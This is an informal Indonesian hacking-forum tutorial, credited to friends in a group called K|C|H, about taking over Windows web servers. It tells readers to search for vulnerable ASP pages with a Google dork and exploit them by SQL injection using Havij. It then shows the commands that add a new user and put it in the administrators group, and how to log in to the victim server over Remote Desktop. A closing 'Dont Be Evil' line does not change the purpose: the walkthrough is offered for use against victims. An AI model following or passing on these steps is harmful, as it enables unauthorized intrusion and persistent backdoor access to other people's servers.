Hai guy's,, tutor sederhana ini saya dapat dari sobat saya di K|C|H,yaitu dari j0cker dan flazzer-404
Lets begin gak semua kita mengendalikan web dengan Shell entah b374k atau lotus, atau apapun nama shellnya, kita juga bisa memanfaatkan fitur bawaan windows yaitu Remote Desktop, hanya saja kita tetap harus tahu Username dan Password untuk bisa mengakses server korban. Bila kita melakukan tehnik Sql Injection dan dapat username dan password korban belum tentu itu sama untuk login ke komputer, lha terus mesti gimana ??
Kita bisa memanfaatkan Havij untuk itu, Bahan-bahannya adalah:
Dork.Disini saya menggunakan Dork inurl:/*.asp?id=
Havij
koneksi internet
kesabaran mencari korban
Ok, saya asumsikan rekan-rekan semua sudah dapet korban dan dah discan pake havij,lalu kita pilih icon CMD di Havij dan di kolom itu kita pilih "net user (nama login kesukaan) ( password) /add" dan kita klik "execute"
kalau udah selesai kita pilih "net localgroup administrators (nama login kesukaan) /add" dan klik lagi "execute"
heheh...selesai deh tugas pertama,setelah itu kita buka fasilitas windows nya,yaitu remote desktop, caranya start-all programa-accessories-remote desktop, lalu kita masukkan ip target kita dan klik connect,tunggu sejenak sampai koneksi tercipta..
selanjutnya terserah anda...pesan saya Dont Be Evil, ingat UU ITE, Lakukanlah hacking yang beretika..caow.
thanks to my friend : j0cker, and Flazzer-404 ^^
